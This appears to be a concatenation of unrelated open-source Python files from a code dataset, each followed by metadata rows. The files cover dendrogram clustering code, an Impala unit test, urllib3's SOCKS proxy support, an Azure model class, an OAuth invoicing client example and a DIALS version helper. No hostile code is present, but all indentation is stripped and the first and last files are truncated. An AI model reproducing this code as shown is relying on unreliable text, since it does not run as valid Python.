raise ValueError("orientation must be one of 'top', 'left', "
"'bottom', or 'right'")
is_valid_linkage(Z, throw=True, name='Z')
Zs = Z.shape
n = Zs[0] + 1
if type(p) in (int, float):
p = int(p)
else:
raise TypeError('The second argument must be a number')
if truncate_mode not in ('lastp', 'mlab', 'mtica', 'level', 'none', None):
raise ValueError('Invalid truncation mode.')
if truncate_mode == 'lastp' or truncate_mode == 'mlab':
if p > n or p == 0:
p = n
if truncate_mode == 'mtica' or truncate_mode == 'level':
if p <= 0:
p = np.inf
if get_leaves:
lvs = []
else:
lvs = None
icoord_list = []
dcoord_list = []
color_list = []
current_color = [0]
currently_below_threshold = [False]
if no_leaves:
ivl = None
else:
ivl = []
if color_threshold is None or \
(isinstance(color_threshold, string_types) and
color_threshold == 'default'):
color_threshold = max(Z[:, 2]) * 0.7
R = {'icoord': icoord_list, 'dcoord': dcoord_list, 'ivl': ivl,
'leaves': lvs, 'color_list': color_list}
if show_contracted:
contraction_marks = []
else:
contraction_marks = None
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=2 * n - 2, iv=0.0, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
if not no_plot:
mh = max(Z[:, 2])
_plot_dendrogram(icoord_list, dcoord_list, ivl, p, n, mh, orientation,
no_labels, color_list,
leaf_font_size=leaf_font_size,
leaf_rotation=leaf_rotation,
contraction_marks=contraction_marks,
ax=ax,
above_threshold_color=above_threshold_color)
return R
def _append_singleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,
i, labels):
# If the leaf id structure is not None and is a list then the caller
# to dendrogram has indicated that cluster id's corresponding to the
# leaf nodes should be recorded.
if lvs is not None:
lvs.append(int(i))
# If leaf node labels are to be displayed...
if ivl is not None:
# If a leaf_label_func has been provided, the label comes from the
# string returned from the leaf_label_func, which is a function
# passed to dendrogram.
if leaf_label_func:
ivl.append(leaf_label_func(int(i)))
else:
# Otherwise, if the dendrogram caller has passed a labels list
# for the leaf nodes, use it.
if labels is not None:
ivl.append(labels[int(i - n)])
else:
# Otherwise, use the id as the label for the leaf.x
ivl.append(str(int(i)))
def _append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl, leaf_label_func,
i, labels, show_leaf_counts):
# If the leaf id structure is not None and is a list then the caller
# to dendrogram has indicated that cluster id's corresponding to the
# leaf nodes should be recorded.
if lvs is not None:
lvs.append(int(i))
if ivl is not None:
if leaf_label_func:
ivl.append(leaf_label_func(int(i)))
else:
if show_leaf_counts:
ivl.append("(" + str(int(Z[i - n, 3])) + ")")
else:
ivl.append("")
def _append_contraction_marks(Z, iv, i, n, contraction_marks):
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 0]), n, contraction_marks)
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 1]), n, contraction_marks)
def _append_contraction_marks_sub(Z, iv, i, n, contraction_marks):
if i >= n:
contraction_marks.append((iv, Z[i - n, 2]))
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 0]), n, contraction_marks)
_append_contraction_marks_sub(Z, iv, int(Z[i - n, 1]), n, contraction_marks)
def _dendrogram_calculate_info(Z, p, truncate_mode,
color_threshold=np.inf, get_leaves=True,
orientation='top', labels=None,
count_sort=False, distance_sort=False,
show_leaf_counts=False, i=-1, iv=0.0,
ivl=[], n=0, icoord_list=[], dcoord_list=[],
lvs=None, mhr=False,
current_color=[], color_list=[],
currently_below_threshold=[],
leaf_label_func=None, level=0,
contraction_marks=None,
link_color_func=None,
above_threshold_color='b'):
"""
Calculates the endpoints of the links as well as the labels for the
the dendrogram rooted at the node with index i. iv is the independent
variable value to plot the left-most leaf node below the root node i
(if orientation='top', this would be the left-most x value where the
plotting of this root node i and its descendents should begin).
ivl is a list to store the labels of the leaf nodes. The leaf_label_func
is called whenever ivl != None, labels == None, and
leaf_label_func != None. When ivl != None and labels != None, the
labels list is used only for labeling the leaf nodes. When
ivl == None, no labels are generated for leaf nodes.
When get_leaves==True, a list of leaves is built as they are visited
in the dendrogram.
Returns a tuple with l being the independent variable coordinate that
corresponds to the midpoint of cluster to the left of cluster i if
i is non-singleton, otherwise the independent coordinate of the leaf
node if i is a leaf node.
Returns
-------
A tuple (left, w, h, md), where:
* left is the independent variable coordinate of the center of the
the U of the subtree
* w is the amount of space used for the subtree (in independent
variable units)
* h is the height of the subtree in dependent variable units
* md is the max(Z[*,2]) for all nodes * below and including
the target node.
"""
if n == 0:
raise ValueError("Invalid singleton cluster count n.")
if i == -1:
raise ValueError("Invalid root cluster index i.")
if truncate_mode == 'lastp':
# If the node is a leaf node but corresponds to a non-single cluster,
# it's label is either the empty string or the number of original
# observations belonging to cluster i.
if i < 2 * n - p and i >= n:
d = Z[i - n, 2]
_append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels,
show_leaf_counts)
if contraction_marks is not None:
_append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks)
return (iv + 5.0, 10.0, 0.0, d)
elif i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
elif truncate_mode in ('mtica', 'level'):
if i > n and level > p:
d = Z[i - n, 2]
_append_nonsingleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels,
show_leaf_counts)
if contraction_marks is not None:
_append_contraction_marks(Z, iv + 5.0, i, n, contraction_marks)
return (iv + 5.0, 10.0, 0.0, d)
elif i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
elif truncate_mode in ('mlab',):
pass
# Otherwise, only truncate if we have a leaf node.
#
# If the truncate_mode is mlab, the linkage has been modified
# with the truncated tree.
#
# Only place leaves if they correspond to original observations.
if i < n:
_append_singleton_leaf_node(Z, p, n, level, lvs, ivl,
leaf_label_func, i, labels)
return (iv + 5.0, 10.0, 0.0, 0.0)
# !!! Otherwise, we don't have a leaf node, so work on plotting a
# non-leaf node.
# Actual indices of a and b
aa = int(Z[i - n, 0])
ab = int(Z[i - n, 1])
if aa > n:
# The number of singletons below cluster a
na = Z[aa - n, 3]
# The distance between a's two direct children.
da = Z[aa - n, 2]
else:
na = 1
da = 0.0
if ab > n:
nb = Z[ab - n, 3]
db = Z[ab - n, 2]
else:
nb = 1
db = 0.0
if count_sort == 'ascending' or count_sort == True:
# If a has a count greater than b, it and its descendents should
# be drawn to the right. Otherwise, to the left.
if na > nb:
# The cluster index to draw to the left (ua) will be ab
# and the one to draw to the right (ub) will be aa
ua = ab
ub = aa
else:
ua = aa
ub = ab
elif count_sort == 'descending':
# If a has a count less than or equal to b, it and its
# descendents should be drawn to the left. Otherwise, to
# the right.
if na > nb:
ua = aa
ub = ab
else:
ua = ab
ub = aa
elif distance_sort == 'ascending' or distance_sort == True:
# If a has a distance greater than b, it and its descendents should
# be drawn to the right. Otherwise, to the left.
if da > db:
ua = ab
ub = aa
else:
ua = aa
ub = ab
elif distance_sort == 'descending':
# If a has a distance less than or equal to b, it and its
# descendents should be drawn to the left. Otherwise, to
# the right.
if da > db:
ua = aa
ub = ab
else:
ua = ab
ub = aa
else:
ua = aa
ub = ab
# Updated iv variable and the amount of space used.
(uiva, uwa, uah, uamd) = \
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=ua, iv=iv, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
level=level + 1, contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
h = Z[i - n, 2]
if h >= color_threshold or color_threshold <= 0:
c = above_threshold_color
if currently_below_threshold[0]:
current_color[0] = (current_color[0] + 1) % len(_link_line_colors)
currently_below_threshold[0] = False
else:
currently_below_threshold[0] = True
c = _link_line_colors[current_color[0]]
(uivb, uwb, ubh, ubmd) = \
_dendrogram_calculate_info(
Z=Z, p=p,
truncate_mode=truncate_mode,
color_threshold=color_threshold,
get_leaves=get_leaves,
orientation=orientation,
labels=labels,
count_sort=count_sort,
distance_sort=distance_sort,
show_leaf_counts=show_leaf_counts,
i=ub, iv=iv + uwa, ivl=ivl, n=n,
icoord_list=icoord_list,
dcoord_list=dcoord_list, lvs=lvs,
current_color=current_color,
color_list=color_list,
currently_below_threshold=currently_below_threshold,
leaf_label_func=leaf_label_func,
level=level + 1, contraction_marks=contraction_marks,
link_color_func=link_color_func,
above_threshold_color=above_threshold_color)
max_dist = max(uamd, ubmd, h)
icoord_list.append([uiva, uiva, uivb, uivb])
dcoord_list.append([uah, h, h, ubh])
if link_color_func is not None:
v = link_color_func(int(i))
if not isinstance(v, string_types):
raise TypeError("link_color_func must return a matplotlib "
"color string!")
color_list.append(v)
else:
color_list.append(c)
return (((uiva + uivb) / 2), uwa + uwb, h, max_dist)
def is_isomorphic(T1, T2):
"""
Determines if two different cluster assignments are equivalent.
Parameters
----------
T1 : array_like
An assignment of singleton cluster ids to flat cluster ids.
T2 : array_like
An assignment of singleton cluster ids to flat cluster ids.
Returns
-------
b : bool
Whether the flat cluster assignments `T1` and `T2` are
equivalent.
"""
T1 = np.asarray(T1, order='c')
T2 = np.asarray(T2, order='c')
if type(T1) != np.ndarray:
raise TypeError('T1 must be a numpy array.')
if type(T2) != np.ndarray:
raise TypeError('T2 must be a numpy array.')
T1S = T1.shape
T2S = T2.shape
if len(T1S) != 1:
raise ValueError('T1 must be one-dimensional.')
if len(T2S) != 1:
raise ValueError('T2 must be one-dimensional.')
if T1S[0] != T2S[0]:
raise ValueError('T1 and T2 must have the same number of elements.')
n = T1S[0]
d = {}
for i in xrange(0, n):
if T1[i] in d:
if d[T1[i]] != T2[i]:
return False
else:
d[T1[i]] = T2[i]
return True
def maxdists(Z):
"""
Returns the maximum distance between any non-singleton cluster.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
Returns
-------
maxdists : ndarray
A ``(n-1)`` sized numpy array of doubles; ``MD[i]`` represents
the maximum distance between any cluster (including
singletons) below and including the node with index i. More
specifically, ``MD[i] = Z[Q(i)-n, 2].max()`` where ``Q(i)`` is the
set of all node indices below and including node i.
"""
Z = np.asarray(Z, order='c', dtype=np.double)
is_valid_linkage(Z, throw=True, name='Z')
n = Z.shape[0] + 1
MD = np.zeros((n - 1,))
[Z] = _copy_arrays_if_base_present([Z])
_hierarchy.get_max_dist_for_each_cluster(Z, MD, int(n))
return MD
def maxinconsts(Z, R):
"""
Returns the maximum inconsistency coefficient for each
non-singleton cluster and its descendents.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
R : ndarray
The inconsistency matrix.
Returns
-------
MI : ndarray
A monotonic ``(n-1)``-sized numpy array of doubles.
"""
Z = np.asarray(Z, order='c')
R = np.asarray(R, order='c')
is_valid_linkage(Z, throw=True, name='Z')
is_valid_im(R, throw=True, name='R')
n = Z.shape[0] + 1
if Z.shape[0] != R.shape[0]:
raise ValueError("The inconsistency matrix and linkage matrix each "
"have a different number of rows.")
MI = np.zeros((n - 1,))
[Z, R] = _copy_arrays_if_base_present([Z, R])
_hierarchy.get_max_Rfield_for_each_cluster(Z, R, MI, int(n), 3)
return MI
def maxRstat(Z, R, i):
"""
Returns the maximum statistic for each non-singleton cluster and
its descendents.
Parameters
----------
Z : array_like
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
R : array_like
The inconsistency matrix.
i : int
The column of `R` to use as the statistic.
Returns
-------
MR : ndarray
Calculates the maximum statistic for the i'th column of the
inconsistency matrix `R` for each non-singleton cluster
node. ``MR[j]`` is the maximum over ``R[Q(j)-n, i]`` where
``Q(j)`` the set of all node ids corresponding to nodes below
and including ``j``.
"""
Z = np.asarray(Z, order='c')
R = np.asarray(R, order='c')
is_valid_linkage(Z, throw=True, name='Z')
is_valid_im(R, throw=True, name='R')
if type(i) is not int:
raise TypeError('The third argument must be an integer.')
if i < 0 or i > 3:
raise ValueError('i must be an integer between 0 and 3 inclusive.')
if Z.shape[0] != R.shape[0]:
raise ValueError("The inconsistency matrix and linkage matrix each "
"have a different number of rows.")
n = Z.shape[0] + 1
MR = np.zeros((n - 1,))
[Z, R] = _copy_arrays_if_base_present([Z, R])
_hierarchy.get_max_Rfield_for_each_cluster(Z, R, MR, int(n), i)
return MR
def leaders(Z, T):
"""
Returns the root nodes in a hierarchical clustering.
Returns the root nodes in a hierarchical clustering corresponding
to a cut defined by a flat cluster assignment vector ``T``. See
the ``fcluster`` function for more information on the format of ``T``.
For each flat cluster :math:`j` of the :math:`k` flat clusters
represented in the n-sized flat cluster assignment vector ``T``,
this function finds the lowest cluster node :math:`i` in the linkage
tree Z such that:
* leaf descendents belong only to flat cluster j
(i.e. ``T[p]==j`` for all :math:`p` in :math:`S(i)` where
:math:`S(i)` is the set of leaf ids of leaf nodes descendent
with cluster node :math:`i`)
* there does not exist a leaf that is not descendent with
:math:`i` that also belongs to cluster :math:`j`
(i.e. ``T[q]!=j`` for all :math:`q` not in :math:`S(i)`). If
this condition is violated, ``T`` is not a valid cluster
assignment vector, and an exception will be thrown.
Parameters
----------
Z : ndarray
The hierarchical clustering encoded as a matrix. See
``linkage`` for more information.
T : ndarray
The flat cluster assignment vector.
Returns
-------
L : ndarray
The leader linkage node id's stored as a k-element 1-D array
where ``k`` is the number of flat clusters found in ``T``.
``L[j]=i`` is the linkage cluster node id that is the
leader of flat cluster with id M[j]. If ``i < n``, ``i``
corresponds to an original observation, otherwise it
corresponds to a non-singleton cluster.
For example: if ``L[3]=2`` and ``M[3]=8``, the flat cluster with
id 8's leader is linkage node 2.
M : ndarray
The leader linkage node id's stored as a k-element 1-D array where
``k`` is the number of flat clusters found in ``T``. This allows the
set of flat cluster ids to be any arbitrary set of ``k`` integers.
"""
Z = np.asarray(Z, order='c')
T = np.asarray(T, order='c')
if type(T) != np.ndarray or T.dtype != 'i':
raise TypeError('T must be a one-dimensional numpy array of integers.')
is_valid_linkage(Z, throw=True, name='Z')
if len(T) != Z.shape[0] + 1:
raise ValueError('Mismatch: len(T)!=Z.shape[0] + 1.')
Cl = np.unique(T)
kk = len(Cl)
L = np.zeros((kk,), dtype='i')
M = np.zeros((kk,), dtype='i')
n = Z.shape[0] + 1
[Z, T] = _copy_arrays_if_base_present([Z, T])
s = _hierarchy.leaders(Z, T, L, M, int(kk), int(n))
if s >= 0:
raise ValueError(('T is not a valid assignment vector. Error found '
'when examining linkage node %d (< 2n-1).') % s)
return (L, M)
# These are test functions to help me test the leaders function.
def _leaders_test(Z, T):
tr = to_tree(Z)
_leaders_test_recurs_mark(tr, T)
return tr
def _leader_identify(tr, T):
if tr.is_leaf():
return T[tr.id]
else:
left = tr.get_left()
right = tr.get_right()
lfid = _leader_identify(left, T)
rfid = _leader_identify(right, T)
print('ndid: %d lid: %d lfid: %d rid: %d rfid: %d'
% (tr.get_id(), left.get_id(), lfid, right.get_id(), rfid))
if lfid != rfid:
if lfid != -1:
print('leader: %d with tag %d' % (left.id, lfid))
if rfid != -1:
print('leader: %d with tag %d' % (right.id, rfid))
return -1
else:
return lfid
def _leaders_test_recurs_mark(tr, T):
if tr.is_leaf():
tr.asgn = T[tr.id]
else:
tr.asgn = -1
_leaders_test_recurs_mark(tr.left, T)
_leaders_test_recurs_mark(tr.right, T)
|
bsd-3-clause
| 6,255,493,199,539,831,000
| 32.899373
| 155
| 0.588742
| false
| 3.920749
| false
| false
| false
|
cloudera/Impala
|
tests/unittests/test_command.py
|
2
|
1791
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Unit tests for collect_diagnostics.Command
import os
import pytest
import sys
# Update the sys.path to include the modules from bin/diagnostics.
sys.path.insert(0,
os.path.abspath(os.path.join(os.path.dirname(__file__), '../../bin/diagnostics')))
from collect_diagnostics import Command
class TestCommand(object):
""" Unit tests for the Command class"""
def test_simple_commands(self):
# Successful command
c = Command(["echo", "foo"], 1000)
assert c.run() == 0, "Command expected to succeed, but failed"
assert c.stdout.strip("\n") == "foo"
# Failed command, check return code
c = Command(["false"], 1000)
assert c.run() == 1
def test_command_timer(self):
# Try to run a command that sleeps for 1000s and set a
# timer for 1 second. The command should timed out.
c = Command(["sleep", "1000"], 1)
assert c.run() != 0, "Command expected to timeout but succeeded."
assert c.child_killed_by_timeout, "Command didn't timeout as expected."
|
apache-2.0
| -3,043,633,197,999,597,600
| 35.55102
| 86
| 0.717476
| false
| 3.919037
| true
| false
| false
|
danielecook/gist-alfred
|
urllib3/contrib/socks.py
|
5
|
6386
|
# -*- coding: utf-8 -*-
"""
This module contains provisional support for SOCKS proxies from within
urllib3. This module supports SOCKS4 (specifically the SOCKS4A variant) and
SOCKS5. To enable its functionality, either install PySocks or install this
module with the ``socks`` extra.
The SOCKS implementation supports the full range of urllib3 features. It also
supports the following SOCKS features:
- SOCKS4
- SOCKS4a
- SOCKS5
- Usernames and passwords for the SOCKS proxy
Known Limitations:
- Currently PySocks does not support contacting remote websites via literal
IPv6 addresses. Any such connection attempt will fail. You must use a domain
name.
- Currently PySocks does not support IPv6 connections to the SOCKS proxy. Any
such connection attempt will fail.
"""
from __future__ import absolute_import
try:
import socks
except ImportError:
import warnings
from ..exceptions import DependencyWarning
warnings.warn((
'SOCKS support in urllib3 requires the installation of optional '
'dependencies: specifically, PySocks. For more information, see '
'https://urllib3.readthedocs.io/en/latest/contrib.html#socks-proxies'
),
DependencyWarning
)
raise
from socket import error as SocketError, timeout as SocketTimeout
from ..connection import (
HTTPConnection, HTTPSConnection
)
from ..connectionpool import (
HTTPConnectionPool, HTTPSConnectionPool
)
from ..exceptions import ConnectTimeoutError, NewConnectionError
from ..poolmanager import PoolManager
from ..util.url import parse_url
try:
import ssl
except ImportError:
ssl = None
class SOCKSConnection(HTTPConnection):
"""
A plain-text HTTP connection that connects via a SOCKS proxy.
"""
def __init__(self, *args, **kwargs):
self._socks_options = kwargs.pop('_socks_options')
super(SOCKSConnection, self).__init__(*args, **kwargs)
def _new_conn(self):
"""
Establish a new connection via the SOCKS proxy.
"""
extra_kw = {}
if self.source_address:
extra_kw['source_address'] = self.source_address
if self.socket_options:
extra_kw['socket_options'] = self.socket_options
try:
conn = socks.create_connection(
(self.host, self.port),
proxy_type=self._socks_options['socks_version'],
proxy_addr=self._socks_options['proxy_host'],
proxy_port=self._socks_options['proxy_port'],
proxy_username=self._socks_options['username'],
proxy_password=self._socks_options['password'],
proxy_rdns=self._socks_options['rdns'],
timeout=self.timeout,
**extra_kw
)
except SocketTimeout:
raise ConnectTimeoutError(
self, "Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout))
except socks.ProxyError as e:
# This is fragile as hell, but it seems to be the only way to raise
# useful errors here.
if e.socket_err:
error = e.socket_err
if isinstance(error, SocketTimeout):
raise ConnectTimeoutError(
self,
"Connection to %s timed out. (connect timeout=%s)" %
(self.host, self.timeout)
)
else:
raise NewConnectionError(
self,
"Failed to establish a new connection: %s" % error
)
else:
raise NewConnectionError(
self,
"Failed to establish a new connection: %s" % e
)
except SocketError as e: # Defensive: PySocks should catch all these.
raise NewConnectionError(
self, "Failed to establish a new connection: %s" % e)
return conn
# We don't need to duplicate the Verified/Unverified distinction from
# urllib3/connection.py here because the HTTPSConnection will already have been
# correctly set to either the Verified or Unverified form by that module. This
# means the SOCKSHTTPSConnection will automatically be the correct type.
class SOCKSHTTPSConnection(SOCKSConnection, HTTPSConnection):
pass
class SOCKSHTTPConnectionPool(HTTPConnectionPool):
ConnectionCls = SOCKSConnection
class SOCKSHTTPSConnectionPool(HTTPSConnectionPool):
ConnectionCls = SOCKSHTTPSConnection
class SOCKSProxyManager(PoolManager):
"""
A version of the urllib3 ProxyManager that routes connections via the
defined SOCKS proxy.
"""
pool_classes_by_scheme = {
'http': SOCKSHTTPConnectionPool,
'https': SOCKSHTTPSConnectionPool,
}
def __init__(self, proxy_url, username=None, password=None,
num_pools=10, headers=None, **connection_pool_kw):
parsed = parse_url(proxy_url)
if username is None and password is None and parsed.auth is not None:
split = parsed.auth.split(':')
if len(split) == 2:
username, password = split
if parsed.scheme == 'socks5':
socks_version = socks.PROXY_TYPE_SOCKS5
rdns = False
elif parsed.scheme == 'socks5h':
socks_version = socks.PROXY_TYPE_SOCKS5
rdns = True
elif parsed.scheme == 'socks4':
socks_version = socks.PROXY_TYPE_SOCKS4
rdns = False
elif parsed.scheme == 'socks4a':
socks_version = socks.PROXY_TYPE_SOCKS4
rdns = True
else:
raise ValueError(
"Unable to determine SOCKS version from %s" % proxy_url
)
self.proxy_url = proxy_url
socks_options = {
'socks_version': socks_version,
'proxy_host': parsed.host,
'proxy_port': parsed.port,
'username': username,
'password': password,
'rdns': rdns
}
connection_pool_kw['_socks_options'] = socks_options
super(SOCKSProxyManager, self).__init__(
num_pools, headers, **connection_pool_kw
)
self.pool_classes_by_scheme = SOCKSProxyManager.pool_classes_by_scheme
|
mit
| 9,006,006,380,867,902,000
| 32.260417
| 79
| 0.612903
| false
| 4.407177
| false
| false
| false
|
AutorestCI/azure-sdk-for-python
|
azure-servicefabric/azure/servicefabric/models/chaos_context_map_item.py
|
1
|
1090
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ChaosContextMapItem(Model):
"""Describes an item in the ChaosContextMap in ChaosParameters.
.
:param key: The key for a ChaosContextMapItem.
:type key: str
:param value: The value for a ChaosContextMapItem.
:type value: str
"""
_validation = {
'key': {'required': True},
'value': {'required': True},
}
_attribute_map = {
'key': {'key': 'Key', 'type': 'str'},
'value': {'key': 'Value', 'type': 'str'},
}
def __init__(self, key, value):
self.key = key
self.value = value
|
mit
| -7,523,740,089,934,637,000
| 28.459459
| 76
| 0.544954
| false
| 4.192308
| false
| false
| false
|
mirumee/python-invoicible
|
examples/cli.py
|
1
|
7581
|
import cmd
import copy
import httplib
import oauth.oauth as oauth
import pprint
import readline
import sys
import urlparse
import webbrowser
import invoicible
# key and secret granted by the service provider for this consumer application
CONSUMER_KEY = ''
CONSUMER_SECRET_KEY = ''
# access token for this consumer application which allows access to user resources
ACCESS_TOKEN_KEY = ''
ACCESS_TOKEN_SECRET = ''
COMPANY_DOMAIN = ''
def ask(question):
while True:
result = raw_input(question)
if result.lower() in ('y', 'yes', ''):
return True
elif result.lower() in ('n', 'no'):
return False
class InvoicibleOAuthHelper(oauth.OAuthClient):
"""
This is helper for oauth autorization, if you are going to create your own client
you should check the logic of authorize method.
"""
request_token_path = '/oauth/request/token/'
access_token_path = '/oauth/access/token/'
authorization_path = '/oauth/autoryzacja/'
def __init__(self, consumer_key, consumer_secret, company_domain):
self.company_domain = company_domain
self.connection = httplib.HTTPSConnection(self.company_domain)
self.consumer = oauth.OAuthConsumer(consumer_key, consumer_secret)
self.signature_method_hmac_sha1 = oauth.OAuthSignatureMethod_HMAC_SHA1()
def authorize(self):
request_token = self.fetch_request_token()
verifier = self.authorize_token(request_token)
access_token = self.fetch_access_token(verifier)
return access_token
def fetch_request_token(self):
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer,
http_url=urlparse.urlunparse(("https", self.company_domain, self.request_token_path, None, None, None))
)
oauth_request.sign_request(self.signature_method_hmac_sha1, self.consumer, None)
self.connection.request(
oauth_request.http_method,
self.request_token_path,
headers=oauth_request.to_header()
)
response = self.connection.getresponse()
self._request_token = oauth.OAuthToken.from_string(response.read())
return self._request_token
def fetch_verifier(self, url):
webbrowser.open_new(url)
verifier = raw_input('Copy verifier which you should see on page after autorization:')
return verifier
def authorize_token(self, request_token):
oauth_request = oauth.OAuthRequest.from_token_and_callback(
token=request_token,
http_url=urlparse.urlunparse(("https", self.company_domain, self.authorization_path, None, None, None))
)
self._verifier = self.fetch_verifier(oauth_request.to_url())
return self._verifier
def fetch_access_token(self, verifier=None):
self._request_token.verifier = verifier
oauth_request = oauth.OAuthRequest.from_consumer_and_token(
self.consumer,
token=self._request_token,
http_url=urlparse.urlunparse(("https", self.company_domain, self.access_token_path, None, None, None))
)
oauth_request.sign_request(self.signature_method_hmac_sha1, self.consumer, self._request_token)
self.connection.request(oauth_request.http_method, self.access_token_path, headers=oauth_request.to_header())
response = self.connection.getresponse()
self.access_token = oauth.OAuthToken.from_string(response.read())
return self.access_token
class SimpleClientCommandLine(cmd.Cmd):
"""
Really simple invoicible application. It allows to list and updates some resources through api.
"""
def __init__(self, client, *args, **kwargs):
self.client = client
self.customer_manager = invoicible.CustomerManager(self.client)
self.estimate_manager = invoicible.EstimateManager(self.client)
self.invoice_manager = invoicible.InvoiceManager(self.client)
self.prompt = "invoicible$ "
self.intro = "\nThis is really simple invoicible api client. Type 'help' or '?' for usage hints.\n"
#cmd.Cmd is old style class
cmd.Cmd.__init__(self, *args, **kwargs)
def do_help(self, *args):
print "list"
#print "create"
print "delete"
print "quit"
def help_delete(self):
print "delete resource_uri"
def do_delete(self, line):
args = line.split()
if len(args) != 1:
return self.help_delete()
else:
self.client.delete_resource(args[0])
def help_list(self):
print "list invoices|estimates|customers"
def do_list(self, line):
args = line.split()
if len(args) != 1 or args[0] not in ['invoices', 'customers', 'estimates']:
return self.help_list()
if args[0] == 'customers':
result = self.customer_manager.all()
elif args[0] == 'estimates':
result = self.estimate_manager.all()
else:
result = self.invoice_manager.all()
pprint.pprint(result)
def complete_list(self, line, *args):
return [ command for command in ('invoices', 'customers', 'estimates') if command.startswith(line)]
def do_EOF(self, line):
print ""
return 1
do_quit = do_EOF
def run_example(consumer_key=CONSUMER_KEY, consumer_secret=CONSUMER_SECRET_KEY,
access_token_key=ACCESS_TOKEN_KEY, access_token_secret=ACCESS_TOKEN_SECRET, company_domain=COMPANY_DOMAIN):
if not consumer_key or not consumer_secret:
print """
You have not provided application (oauth consumer) keys. Please search invoicible api (centrumfaktur.pl/api)
documentation for testing keys (or generate new ones for your application in invoivible service)
and put those values into this file (%s) as CONSUMER_KEY and CONSUMER_SECRET_KEY.
""" % (__file__)
sys.exit(1)
if not company_domain:
company_domain = raw_input("Please provide company domain (and put it to this file as COMPANY_DOMAIN to prevent this step in the future) which resources you want to access (for example: mycompany.centrumfaktur.pl): ")
if not access_token_key and not access_token_secret:
print """
You have not provided oauth access token which allows your application access given user resources.
If you have already those keys generated please put them into this file (%s) as ACCESS_TOKEN_KEY and
ACCESS_TOKEN_SECRET.
""" % (__file__)
if not ask("Do you want to generate access token ([y]/n)?"):
sys.exit(1)
oauth_helper = InvoicibleOAuthHelper(consumer_key, consumer_secret, company_domain)
access_token = oauth_helper.authorize()
access_token_key, access_token_secret = access_token.key, access_token.secret
print """
Please copy access token key: %s and access token secret: %s as ACCESS_TOKEN_KEY and ACCESS_TOKEN_SECRET
into this file (%s) so next time you will skip application autorization step.
""" % (access_token_key, access_token_secret, __file__)
if not company_domain:
company_domain = raw_input("Please provide company domain (for example: mycompany.centrumfaktur.pl - you can put it to this file as COMPANY_DOMAIN):")
invoicible_client = invoicible.Client(
consumer_key,
consumer_secret,
access_token_key,
access_token_secret,
invoicible_domain = company_domain,
)
command_line = SimpleClientCommandLine(invoicible_client)
command_line.cmdloop()
if __name__ == "__main__":
run_example()
|
lgpl-3.0
| -4,260,646,054,423,910,400
| 37.678571
| 225
| 0.664688
| false
| 3.863914
| false
| false
| false
|
dials/dials
|
util/version.py
|
1
|
4510
|
# DIALS version numbers are constructed from
# 1. a common prefix
__dials_version_format = "DIALS %s"
# 2. the most recent annotated git tag (or failing that: a default string)
__dials_version_default = "3.5"
# 3. a dash followed by the number of commits since that tag
# 4. a dash followed by a lowercase 'g' and the current commit id
def get_git_version(dials_path, treat_merges_as_single_commit=False):
import os
import subprocess
version = None
with open(os.devnull, "w") as devnull:
# Obtain name of the current branch. If this fails then the other commands will probably also fail
branch = (
subprocess.check_output(
["git", "branch", "--all", "--contains", "HEAD"],
cwd=dials_path,
stderr=devnull,
)
.rstrip()
.decode("latin-1")
)
releasebranch = "dials-3" in branch
# Always treat merges as single commit on release branches
if releasebranch:
treat_merges_as_single_commit = True
# Get descriptive version string, eg. v1.1.0-1-g56f9cd7
if treat_merges_as_single_commit:
try:
# Get a 'correct' depth, which should be the shortest path to the most recent tag
version = (
subprocess.check_output(
["git", "describe", "--long", "--first-parent"],
cwd=dials_path,
stderr=devnull,
)
.rstrip()
.decode("latin-1")
)
except Exception:
